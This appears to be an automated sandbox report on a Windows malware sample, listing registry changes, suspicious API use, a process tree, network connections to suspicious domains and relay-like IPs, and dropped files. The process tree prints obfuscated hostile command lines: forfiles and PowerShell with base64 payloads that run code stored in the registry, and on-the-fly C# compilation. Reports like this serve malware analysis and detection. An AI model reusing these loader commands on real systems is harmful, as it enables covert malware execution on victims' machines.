| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000b5c2719d4402ce19a3c4d452d5fccb19a0b03547e8feee6c5e6129a97e614e0e000000000e80000000020000200000008369f785becf77e598de1a37e13b4a4a80e4dd5b637d255b6161812a43cc5edbc00000008a77f1996ea9713fe2ed530c7f5b4b79c54661a7c0227c7a164aee7345f67141fe052f15ad9f88d41df43afb8cdc708ee48036454d6d6a0295b83481df3413b34854e222f07af81c67a43ea9bc0da339dd2073755ab497a5c6768d23005dbf0971126f2d2d181cd637d7515d292b9d231f1e6a8c19260ed987db803da22cad8fc688aefa1cc4a4c0cf70fe540e8957e0b8aa37c6bda198fa111c85882cec9dc72ca66bd889b112d7e0e9ff4ae91cfd51752c6895f70c4554fa169bb9daf47c594000000072819e8bbcc6d8ef74d9597b96483136d18805911ec89797187e437e6d11cc2c151cde2cd7451f30a3b2ff7ab0e0600261950c8b4a317f23917d456d19251d40 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\MINIE | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = … | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = … | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000009521245b68481d44b7c4b8cf21a171b600000000020000000000106600000001000020000000f072e04571f3a79c520911520eda0a6f2eac768d3496d11a29edaf9ea778c5f2000000000e8000000002000020000000cc84e32e32b8a586558e2a24efa5663ef8eddea3ca0a20961a89a533bc255b67c00000005b8197e1023d200f6ab6d4ee2de49c43ac550f5b7795c9f88a0965ce17599d42b51359fff60ba64f611537cafff3fc9e511c5ecd0d083f249b072a507c394659a778408f5425b48680f2b30eb098b0422761d69c0e8f7e4eb11ae213810868615986237ef3f2a432d876e6ca29fca03c53f6f24acf630edf8c1d3531c9d0de8282d5d5b9532158fe8218c560b7f189c220f308abc88b7b6ebc9b001d29ea241f4942223dfdea14d9ff90b97c864223d85566b40d99db10609a54c1a50f2a75954000000038ea2a2eb3ef1dad0ce43ebd65013c0205f4bf7460384b94ce80aa29081456dc2bccd49e320f211e40243e8d35f3735b8df4a83c9f507fed0739c48eae67781a | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff1a0000001a000000a00400007f020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1239828497" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = … | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = … | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = … | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30947454" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\520636dbbdc33d8dbdf1b14f043b46f8.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\520636dbbdc33d8dbdf1b14f043b46f8.exe
"C:\Users\Admin\AppData\Local\Temp\520636dbbdc33d8dbdf1b14f043b46f8.exe"
C:\Program Files (x86)\Internet Explorer\ielowutil.exe
"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:17410 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82950 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82954 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82958 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82962 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:17412 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82968 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82972 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82976 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82980 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4440 CREDAT:82984 /prefetch:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /min forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBhAGMAYwBvAG4AJwApAC4ATQA= & exit" /p C:\Windows\system32 /s /m po*l.e*e
C:\Windows\system32\forfiles.exe
forfiles /c "cmd /k @path -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBhAGMAYwBvAG4AJwApAC4ATQA= & exit" /p C:\Windows\system32 /s /m po*l.e*e
C:\Windows\system32\cmd.exe
/k "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBhAGMAYwBvAG4AJwApAC4ATQA= & exit
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -ec aQBlAHgAIAAoAGcAcAAgACcASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBhAGMAYwBvAG4AJwApAC4ATQA=
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAG8AdgB0AHMAbAB5ACkAOwBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABvAHYAdABzAGwAeQApACcA
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JwBwAGEAcgBhAG0AKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApADsAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHAAYgBmAG0AYwBnAHQAcwB1AGYAbQApACcA
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yduppq40\yduppq40.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD4FC.tmp" "c:\Users\Admin\AppData\Local\Temp\yduppq40\CSC1C2BCD08D0674F4EBB14B4F82C2728A0.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gkonnpn0\gkonnpn0.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD692.tmp" "c:\Users\Admin\AppData\Local\Temp\gkonnpn0\CSCFBE45FDC2F347C08385E222A1869041.TMP"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 444 -ip 444
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 444 -s 624
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | licensing.mp.microsoft.com | udp |
| US | 20.223.25.224:443 | licensing.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | storesdk.dsx.mp.microsoft.com | udp |
| NL | 104.80.225.205:443 | storesdk.dsx.mp.microsoft.com | tcp |
| US | 20.223.25.224:443 | licensing.mp.microsoft.com | tcp |
| US | 20.223.25.224:443 | licensing.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | gogojoob.xyz | udp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| US | 8.8.8.8:53 | licensing.mp.microsoft.com | udp |
| US | 20.223.25.224:443 | licensing.mp.microsoft.com | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| NL | 194.104.136.213:443 | gogojoob.xyz | tcp |
| GB | 91.244.181.85:443 | | tcp |
| AT | 193.80.211.63:8080 | | tcp |
| NL | 45.137.184.31:80 | 45.137.184.31 | tcp |
| FR | 62.210.137.233:443 | 62.210.137.233 | tcp |
| RO | 89.34.27.237:9030 | 89.34.27.237 | tcp |
| FR | 62.210.137.233:443 | 62.210.137.233 | tcp |
| US | 199.249.230.117:80 | 199.249.230.117 | tcp |
| RO | 89.34.27.237:9030 | 89.34.27.237 | tcp |
| HK | 91.245.255.40:80 | 91.245.255.40 | tcp |
| DE | 45.14.233.149:80 | 45.14.233.149 | tcp |
| GB | 139.162.210.252:80 | 139.162.210.252 | tcp |
| US | 199.249.230.82:80 | 199.249.230.82 | tcp |
| DE | 45.14.233.149:80 | 45.14.233.149 | tcp |
| US | 199.249.230.117:80 | 199.249.230.117 | tcp |
| US | 199.249.230.82:80 | 199.249.230.82 | tcp |
| GB | 82.69.47.114:9030 | 82.69.47.114 | tcp |
| DE | 185.117.215.9:80 | 185.117.215.9 | tcp |
| US | 8.8.8.8:53 | unavas.xyz | udp |
| US | 8.8.8.8:53 | microsoft.com | udp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| US | 45.61.185.53:80 | 45.61.185.53 | tcp |
| RO | 89.34.27.237:9030 | 89.34.27.237 | tcp |
| SE | 83.226.182.52:8080 | 83.226.182.52 | tcp |
| US | 209.250.2.254:80 | 209.250.2.254 | tcp |
| HK | 91.245.255.40:80 | 91.245.255.40 | tcp |
| DE | 138.201.169.12:80 | 138.201.169.12 | tcp |
| PL | 82.118.21.102:80 | 82.118.21.102 | tcp |
| US | 199.249.230.66:80 | 199.249.230.66 | tcp |
| DE | 92.222.79.186:80 | 92.222.79.186 | tcp |
| CA | 199.58.81.140:80 | 199.58.81.140 | tcp |
| US | 199.249.230.82:80 | 199.249.230.82 | tcp |
| DE | 84.158.119.183:9030 | 84.158.119.183 | tcp |
| US | 199.249.230.74:80 | 199.249.230.74 | tcp |
| US | 199.249.230.176:80 | 199.249.230.176 | tcp |
| ID | 139.99.46.190:9030 | 139.99.46.190 | tcp |
| DE | 77.23.199.118:9030 | 77.23.199.118 | tcp |
| NL | 188.226.222.19:80 | 188.226.222.19 | tcp |
| DE | 90.186.84.208:8080 | 90.186.84.208 | tcp |
| TW | 118.163.74.160:80 | 118.163.74.160 | tcp |
| US | 199.249.230.82:80 | 199.249.230.82 | tcp |
| ZA | 160.119.249.240:80 | 160.119.249.240 | tcp |
| US | 199.249.230.173:80 | 199.249.230.173 | tcp |
| AT | 86.59.21.38:80 | 86.59.21.38 | tcp |
| JP | 182.169.28.173:80 | 182.169.28.173 | tcp |
| UA | 95.67.38.55:9030 | 95.67.38.55 | tcp |
| US | 185.220.103.112:80 | 185.220.103.112 | tcp |
| US | 8.8.8.8:53 | curlmyip.net | udp |
| FI | 135.181.84.242:80 | curlmyip.net | tcp |
| AT | 37.252.185.87:80 | 37.252.185.87 | tcp |
| CR | 200.122.181.78:80 | 200.122.181.78 | tcp |
| US | 199.249.230.176:80 | 199.249.230.176 | tcp |
| DE | 45.14.233.159:80 | 45.14.233.159 | tcp |
| US | 38.147.122.254:80 | 38.147.122.254 | tcp |
| NL | 91.242.229.120:443 | unavas.xyz | tcp |
| US | 38.147.122.252:80 | 38.147.122.252 | tcp |
| US | 99.149.215.67:80 | 99.149.215.67 | tcp |
| CR | 200.122.181.101:80 | 200.122.181.101 | tcp |
| CL | 170.239.86.145:80 | 170.239.86.145 | tcp |
| DE | 178.254.35.99:80 | 178.254.35.99 | tcp |
| FR | 62.210.205.228:80 | 62.210.205.228 | tcp |
| US | 199.249.230.176:80 | 199.249.230.176 | tcp |
| US | 154.35.175.225:80 | 154.35.175.225 | tcp |
| US | 199.249.230.142:80 | 199.249.230.142 | tcp |
| NL | 5.2.72.226:80 | 5.2.72.226 | tcp |
| MY | 124.217.246.98:80 | 124.217.246.98 | tcp |
| VN | 125.212.217.197:80 | 125.212.217.197 | tcp |
| DE | 178.254.35.99:80 | 178.254.35.99 | tcp |
| US | 199.249.230.82:80 | 199.249.230.82 | tcp |
| US | 199.249.230.66:80 | 199.249.230.66 | tcp |
| PL | 192.166.245.158:80 | 192.166.245.158 | tcp |
| US | 199.249.230.73:80 | 199.249.230.73 | tcp |
| DE | 185.216.179.206:80 | 185.216.179.206 | tcp |
| US | 199.249.230.150:80 | 199.249.230.150 | tcp |
| US | 199.249.230.70:80 | 199.249.230.70 | tcp |
| BE | 45.128.133.206:80 | 45.128.133.206 | tcp |
| SE | 193.189.100.203:80 | 193.189.100.203 | tcp |
| FR | 163.172.94.144:9030 | 163.172.94.144 | tcp |
| LU | 104.244.73.126:80 | 104.244.73.126 | tcp |
| US | 199.249.230.77:80 | 199.249.230.77 | tcp |
| FR | 5.39.73.41:80 | 5.39.73.41 | tcp |
| FR | 92.243.29.88:80 | 92.243.29.88 | tcp |
| SE | 153.92.126.234:80 | 153.92.126.234 | tcp |
| US | 199.249.230.143:80 | 199.249.230.143 | tcp |
| DE | 178.254.9.25:80 | 178.254.9.25 | tcp |
| PL | 51.83.129.245:80 | | tcp |
| US | 199.249.230.84:80 | 199.249.230.84 | tcp |
| SE | 193.189.100.203:80 | | tcp |
| NL | 5.2.72.226:80 | | tcp |
Files
memory/444-134-0x00000000005CE000-0x00000000005DA000-memory.dmp
memory/444-135-0x00000000005CE000-0x00000000005DA000-memory.dmp
memory/444-136-0x0000000000590000-0x000000000059C000-memory.dmp
memory/444-137-0x0000000001000000-0x000000000106F000-memory.dmp
memory/444-138-0x00000000005A0000-0x00000000005B0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\2psodd8\imagestore.dat
| MD5 | b07c239f418299f3b983557b171e5523 |
| SHA1 | f13960edf84337c30db5ed9b48a0aaea2ffe1805 |
| SHA256 | bc0ac00d36dedbf66b153395c9f6830e9a558c5112d2c286119a507323ed7709 |
| SHA512 | a37aa264a0bbea2a76c7b255baf335451d7188cb4d4a0d45c1cb725ca19cb6dd49cce18cf654eb55b3e32e79d1b0db7ea75636640dddf93ceb522975c02af6e6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\558DW1ID\favicon[1].ico
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
\??\c:\Users\Admin\AppData\Local\Temp\yduppq40\yduppq40.cmdline
\??\c:\Users\Admin\AppData\Local\Temp\yduppq40\yduppq40.0.cs
\??\c:\Users\Admin\AppData\Local\Temp\yduppq40\CSC1C2BCD08D0674F4EBB14B4F82C2728A0.TMP
C:\Users\Admin\AppData\Local\Temp\RESD4FC.tmp
C:\Users\Admin\AppData\Local\Temp\yduppq40\yduppq40.dll
\??\c:\Users\Admin\AppData\Local\Temp\gkonnpn0\gkonnpn0.cmdline
\??\c:\Users\Admin\AppData\Local\Temp\gkonnpn0\gkonnpn0.0.cs
\??\c:\Users\Admin\AppData\Local\Temp\gkonnpn0\CSCFBE45FDC2F347C08385E222A1869041.TMP
C:\Users\Admin\AppData\Local\Temp\RESD692.tmp
C:\Users\Admin\AppData\Local\Temp\gkonnpn0\gkonnpn0.dll
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive